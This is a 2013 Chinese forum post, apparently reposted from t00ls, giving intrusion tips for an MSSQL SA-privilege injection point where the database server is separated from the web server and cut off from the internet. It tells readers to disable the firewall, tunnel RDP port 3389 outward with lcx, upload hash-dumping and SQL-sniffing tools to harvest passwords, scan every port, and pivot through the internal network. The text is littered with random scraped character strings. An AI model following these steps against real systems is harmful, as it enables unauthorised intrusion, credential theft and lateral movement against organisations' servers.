当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。. R; R% l2 `. h1 K0 p/ w; T( [$ |/ c' [8 {
2 m( H; S2 ~& n6 k! c9 x% L# K2 k
) b: _6 M* _2 \0 ]- m$ J
/ ?; V/ s9 N' D% j. o" c5 g" x+ GSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
2 P( f# `% M+ \( c2 g9 w6 M. q4 s/ C- T) _
9 b9 p, u% J" Q" b一、DB机有公网IP.8 _% {0 q/ h) e
F' N. f* I7 Y. P
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.( x4 g) g/ G* W( k! @
6 E0 H# L1 k: D9 N# o
$ V( S4 g4 s) h& k: k" U2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.2 B0 S& ]9 G! p2 X* \5 q
! n* z$ q5 b3 \) ?+ `6 Z6 h
# S% m: d2 q$ K1 D' ?0 \# q3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com$ V; O+ e- c9 R' d- V# K" }
$ w: v, M Q$ Q
2 A5 s; G; S% b6 |& i' x3 d4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
9 y2 a2 k$ P2 S7 R9 [8 `( x# E6 Y7 B6 K- { C0 g
1 M* N; z7 r0 e( T$ M
, _7 t9 x% v4 r: c7 O' q7 u二、DB机只有内网IP* f2 y6 J! b/ w% p2 p' h6 W
8 s( v' {6 G0 I2 `" f+ M
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
6 ~; k" d* M1 W O% ?% u j }8 b: W$ c" | f
# b! m) `" M9 @9 k+ I' M
2:停掉防火墙和IP策略再从内往外扫描.
" {/ j4 T" b, j
3 [$ S9 P, M' m7 A6 q" }4 ?' ] y- r6 [8 ^! E
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
2 v$ Z' A! @- P- r' f9 `. e1 O
' ?4 O2 u& w8 H6 a8 V; N' ^9 v/ V8 F& [
4:学会密码规律分析往往会有惊喜.% q+ K1 ^3 r: Q( Y, S: E
* `- @# \1 {4 W
5 ]1 E8 Q* i5 J7 ]
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等0 a ?4 s1 {2 D3 S
6 d. w2 Z1 Z" Q+ b+ w4 H$ X R a, q
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对